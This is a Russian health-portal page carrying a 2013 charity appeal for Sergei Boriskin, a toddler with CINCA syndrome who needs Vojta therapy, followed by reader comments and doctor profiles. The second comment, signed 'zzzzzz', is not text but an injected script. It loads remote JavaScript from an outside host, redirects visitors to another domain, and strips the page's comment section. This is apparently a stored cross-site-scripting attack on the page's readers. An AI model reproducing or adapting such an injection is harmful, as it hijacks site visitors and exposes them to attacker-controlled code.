Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Поможем Борискину Сергею  >>  Поможем Борискину Сергею
 
Обратная связь
 

Поможем Борискину Сергею

Размер шрифта
24 января 2013 20:15
  • google_analytics: false
  • Нравится

Сергею нет еще и трех лет, а большую часть своей жизни он провел в больницах, борясь за свою жизнь.

поможем борискину сергею

Сережа родился 27 января 2010 года, восьмимесячным. Через два часа после рождения он не смог сам дышать и был переведен под ИВЛ в больницу в отделение реанимации, где ребенок провел 40 дней. После этого Сережу и его маму перевели в педиатрическое отделение, где они провели еще 4 месяца. За это время мальчику удалили аппендикс и сделали три переливания крови – и это далеко не весь перечень процедур, которые были сделаны.

Первый год жизни мальчик полностью провел в больницах. Окончательный и основной диагноз – синдром CINCA. Это очень редкое заболевание, в результате которого происходит повреждение белка, отвечающего за реакцию организма на инфекцию. Диагноз был поставлен Сергею, когда ему исполнилось 2 года и 1 месяц.

Сейчас ему 2 года и 9 месяцев. Он до сих пор не может сидеть, ползать, пережевывать пищу, а тем более – ходить.

Лечение по основному диагнозу началось три месяца назад. Оно заключается в том, что каждое утро ставится укол препаратом «Анакинра», который в России не сертифицирован. Лечение пожизненное и отмене не подлежит. Но анализы приходят постепенно в норму, поэтому необходимо проходить интенсивную реабилитацию.

Мама Сережи говорит: «Мне очень хочется, чтобы мой сын жил, а не существовал, тем более на это есть все шансы. Моя задача как мамы ребенка-инвалида – дать ему любовь, заботу, надежду и уверенность в том, что все наладится».

Помимо общеукрепляющего массажа, бассейна, занятий с логопедом, физиотерапии и лечебной физкультуры, необходима Войта-терапия (курс из 10 занятий). Стоимость полного курса составляет 85 000 рублей. Помочь ребенку вы можете в фонде помощи детям «Подсолнух».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

27 января 2013 в 13:38

Цитировать   |   Пожаловаться

Какой ужас.. Безумно жалко этого кроху. не успел только на свет появиться - и уже такие испытания... Конечно же я помогу этому ребенку, и думаю ни одна женщина не останется равнодушной. Ведь такое с каждым ребенком может случиться и всеобщими усилиями таких детей можно спасти 

2 - zzzzzz

30 июня 2015 в 23:25

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Лежачие полицейские помогут распознать аппендицит   Белок семян подсолнуха – новый переносчик лекарств   Как не стать лысой зимой   Белок, охраняющий слух  

Слайдшоу

1
Вся правда о белковой еде Белковая диета: польза и вред
Самая населенная часть тела 7 болей, которые нельзя игнорировать
Как развеселиться и похудеть? Под лежачий камень вода не течет! Камни в почках!
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.